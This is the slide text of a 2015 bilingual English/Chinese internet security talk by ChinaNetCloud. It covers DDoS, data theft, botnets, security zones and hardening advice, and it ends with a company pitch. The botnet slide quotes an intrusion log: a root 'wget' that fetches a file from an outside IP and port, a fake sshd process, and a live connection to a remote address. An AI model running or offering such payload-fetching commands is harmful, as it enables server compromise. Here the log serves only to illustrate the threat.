Presentation on Internet Security by @SteveMushero of @ChinaNetCloud, given in Shanghai in May, 2015.
Covers threats, risks, and solutions.
Bi-lingual English & Chinese.
2. Running the World’s Internet Servers www.ChinaNetCloud.com
Big Exciting Internet
令人激动的互联网
0
500
1,000
1,500
2,000
2,500
3,000
3,500
1994
1996
1998
2000
2002
2004
2006
2008
2010
2012
2014*
Internet Users (in millions)
Source: Internet Live Stats
Note: * estimate for July 1, 2014. Growth in percentages
80%
76%
73%
56%
49%
47%
3. Running the World’s Internet Servers www.ChinaNetCloud.com
Use every day for everything
每一天,时刻陪伴
4. Running the World’s Internet Servers www.ChinaNetCloud.com
For Every Part of Life
融入生活的每一部分
5. Running the World’s Internet Servers www.ChinaNetCloud.com
But not everything is happy
但,不是诸事如意
6. Running the World’s Internet Servers www.ChinaNetCloud.com
Today’s Three Security Problems
当今三大安全问题
• DDoS
• Steal Data
数据盗窃
• Botnets
僵尸网络
7. Running the World’s Internet Servers www.ChinaNetCloud.com
Security Problem #1 – DDoS
第一安全问题-DDoS
• For Fun 捣蛋
• Get Money 赚钱
• Competitors 竞争
8. Running the World’s Internet Servers www.ChinaNetCloud.com
Security Problem #2 – Stealing Data
第二安全问题-数据盗窃 • Steal Money
偷钱
• Steal/Sell Data
偷数据
• Steal Code
偷代码
9. Running the World’s Internet Servers www.ChinaNetCloud.com
Security Problem #3 – BotNets
第三安全问题-僵尸网络
• Break In 攻入
• Install Root Kit 安装
• Call home for control 呼叫
• Do evil 作恶
Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP
root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd
sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED)
10. Running the World’s Internet Servers www.ChinaNetCloud.com
Where is Operations & Security ?
Duang – 运维和安全在哪里 ?
11. Running the World’s Internet Servers www.ChinaNetCloud.com
Our Job is to Serve & Protect
我们的职责就是安全代维
12. Running the World’s Internet Servers www.ChinaNetCloud.com
Security is Secondary, Not Important
安全是次要的
Features - 特点
Performance - 性能
Convenience - 便捷
Security
安全
13. Running the World’s Internet Servers www.ChinaNetCloud.com
But becoming more important
但逐渐重要
P2P Lending金融
E-Commerce
SaaSFeatures - 特点
Performance - 性能
Convenience - 便捷
Security
安全
14. Running the World’s Internet Servers www.ChinaNetCloud.com
How to be Secure ?
如何安全加固
15. Running the World’s Internet Servers www.ChinaNetCloud.com
What is the most Secure Application?
什么是最安全的应用
16. Running the World’s Internet Servers www.ChinaNetCloud.com
Lots of pieces
很多方面
• Internet – 互联网
• Firewalls - 防火墙
• Web/App Servers - 服务器
• Database - 数据库
• OS - 操作系统
• Servers /Cloud - 物理机/云
17. Running the World’s Internet Servers www.ChinaNetCloud.com
4 Security Zones
4大安全区域
Internet
互联网
In Front of
Your
Application
应用之上
Inside
Your App
应用之内
Under
Your App
应用之下
18. Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: Internet
互联网
Internet
互联网
In Front of
Your
Application
Inside
Your
Application Under
Your
Application
19. Running the World’s Internet Servers www.ChinaNetCloud.com
DDoS Attacks
DDoS 攻击
20. Running the World’s Internet Servers www.ChinaNetCloud.com
DDoS Type 1 – Overload Bandwidth
第一种类型-带宽超载
21. Running the World’s Internet Servers www.ChinaNetCloud.com
DDoS Type 2 – Overload Servers
第二种类型-服务器超载
22. Running the World’s Internet Servers www.ChinaNetCloud.com
DDoS – Solutions
防DDoS策略
• Cloud Filtering – Anquanbao 安全宝
• CDN Support -CDN支持
• IDC Hardware -IDC 硬件
• Front of Application Blocking
在应用之前阻断
• Complex & Difficult - 复杂而困难
• In Application Mitigation
在应用之内缓解
• Caching - 缓存
23. Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: In Front of Your Application
应用之上
Internet
In Front of
Your
Application
应用之上
Inside
Your
Application Under
Your
Application
24. Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: In Front of Your Application
应用之上
26. Running the World’s Internet Servers www.ChinaNetCloud.com
WAF – Web App Firewall
WAF – 网页应用防火墙
• Increasingly Required
上升的需求
• More Advanced
更加先进
• More Complex
更加复杂
• Can break your Application
会影响应用
• Hard to Manage
难以管理
• Hard to Monitor
难以监控
• Different Types
多种类型
• Patterns vs. Heuristics
安全宝
29. Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: Inside Your Application
在应用之内
Internet
Inside
Your
Application
在应用之内
Under
Your
Application
In Front of
Your
Application
30. Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application
在应用之内
Main App Security Problem ?
APP主要应用安全的问题是什么?
31. Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application
在应用之内
Inside YOUR Application
在你的应用里面
32. Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application
在应用之内
Your Code
你的代码
33. Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application
在应用之内
怎么办?
34. Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application
在应用之内
Write secure code
写安全的代码
35. Running the World’s Internet Servers www.ChinaNetCloud.com
Secure Code – Difficult & Frustrating
安全代码 – 又难又麻烦
36. Running the World’s Internet Servers www.ChinaNetCloud.com
Code – OWASP Project Resources
代码 – OWASP 项目资源
• Info - 介绍
• Guides - 指引
• Tools - 工具
http://owasp.org.cn
38. Running the World’s Internet Servers www.ChinaNetCloud.com
Inside Your Application – App Scanning
在应用之内-APP扫描
• Best practice
最佳实践
• Find new problems
找到新问题
• As you update
更新
• Third parties
第三方
• New exploits
新的改进
39. Running the World’s Internet Servers www.ChinaNetCloud.com
Zone: Under Your Application
在应用之下
Internet
Under
Your
Application
在应用之下
In Front of
Your
Application
Inside
Your
Application
40. Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application ?
在应用之下
什么意思?
41. Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Cloud & Servers
在应用之下-云 & 物理服务器
• Services
• Servers & OS
• Cloud
• Network
• 服务软件
• 服务器和操作系统
• 云
• 网络
42. Running the World’s Internet Servers www.ChinaNetCloud.com
Cloud & Servers – Love & Respect Them
在应用之下-需要被关注
• Often forgotten
经常被遗忘
• Often use defaults
经常采取默认设置
• Or random Google search
或用谷歌搜索配置
• Source of great danger
风险的发源地
43. Running the World’s Internet Servers www.ChinaNetCloud.com
Services – Web Servers
服务-网页服务器
• Best practices
最佳实践
• Lots of small issues
许多细小问题
• Running user - 用户运行
• File permissions - 文件许可
• Dangerous uploads - PHP inside JPEGs !
危险的上传
• SSL – Heartbleed, etc.
44. Running the World’s Internet Servers www.ChinaNetCloud.com
Services – App Servers
服务-APP服务器
• Best Practices
最佳实践
• Delete example APPs
删除样例
• Delete tools (Tomcat)
删除工具
• Patch Software (Java!)
软件补丁
45. Running the World’s Internet Servers www.ChinaNetCloud.com
Services – Database Servers
服务- 数据库服务器
• Use Best Practices
最佳实践
• Secure Configuration
安全配置
• Limited User Permission
限制用户许可
• Separate App & DBA User
区分APP和DBA用户
46. Running the World’s Internet Servers www.ChinaNetCloud.com
Services – Database Servers
服务- 数据库服务器
• Separate User for each App
区分每个APP的用户
• Safe File Permissions
安全的文件许可
• Log SQL if possible
尽可能记录SQL
47. Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Server & OS
应用之下-服务器&操作系统
• Hardened OS
加固
• Iptables
防火墙
• Run Users
用户运行
• File permissions
文件许可
48. Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Server & OS
应用之下-服务器&操作系统
• Logging
日志
• Scanning (ClamAV)
扫描
• Track activity
轨迹追踪
• Automate
自动
• System Updates
系统升级
49. Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Cloud
应用之下-云
• Best Practices
最佳实践
• Control Access
控制登录权限
• Can delete EVERYTHING
会被意外删除
50. Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Cloud
应用之下-云
• Separate Backups
备份隔离
• Out of Cloud
在云之外
• MFA Delete on AWS
• AWS上删除MFA
51. Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Network
应用之下-网络
• Generally okay, BUT
• VPC on Clouds – Separate
使用公共云上隔离的私有网络
• Consider Out-of-Band Link (DDoS)
考虑带外数据链接
52. Running the World’s Internet Servers www.ChinaNetCloud.com
Under Your Application – Network
应用之下-网络
• Firewalls – Front & Middle
防火墙-前端&中间
• Secure Configuration
安全配置
• Separate test/dev network
区分测试/开发
53. Running the World’s Internet Servers www.ChinaNetCloud.com
Backups as Security
备份即安全
• Backups ARE part of Security
备份属于安全管理的范畴
• If all else fails, use backups
若发生意外,使用备份
• Keep them Secure
安全备份
• Avoid Theft & Tampering
防止盗窃或恶意企图
• Read-Only is Best
最好采用只读
54. Running the World’s Internet Servers www.ChinaNetCloud.com
Security Monitoring
安全监控
55. Running the World’s Internet Servers www.ChinaNetCloud.com
Audit is also Important
审计也很重要
Deep Check to Find Problems
深入检查,发现问题
56. Running the World’s Internet Servers www.ChinaNetCloud.com
Summary
总结
• Security is Critically Important
安全非常重要
• Increasingly Important
并且,越来越重要
• Getting Harder
但也,越来越难
• But more Tools
但,实用工具越来越多
• Details & Experts Help
注重细节,并且需要专家帮助!
57. Running the World’s Internet Servers www.ChinaNetCloud.com
How can ChinaNetCloud help ?
云络怎么帮您?
58. Running the World’s Internet Servers www.ChinaNetCloud.com
We Manage All of this for you
我们为你管理好一切
• Deep Experience
丰富经验
• Experts at Every Level
全面专业
• Part of Overall Operations
是运维工作的一部分
60. Running the World’s Internet Servers www.ChinaNetCloud.com
Thanks from ChinaNetCloud
来自云络的感谢
Pioneers in OaaS – Operations as a Service
运维即服务的先锋团队
61. ChinaNetCloud
Sales@ChinaNetCloud.com
www.ChinaNetCloud.com
Beijing Office:
北京办公室
Lee World Business Building #305
57 Happiness Village Road, Chaoyang District
朝阳区幸福村中路57号利世商务楼305室
Beijing, 100027 China
Silicon Valley Office:
硅谷办公室
California Avenue
Palo Alto, 94123 USA
Shanghai Headquarters:
上海办公室
X2 Space 1-601, 1238 Xietu Lu
Shanghai, 200032 China 斜土路1238号X2空间1号楼601室
T: +86-21-6422-1946 F: +86-21-6422-4911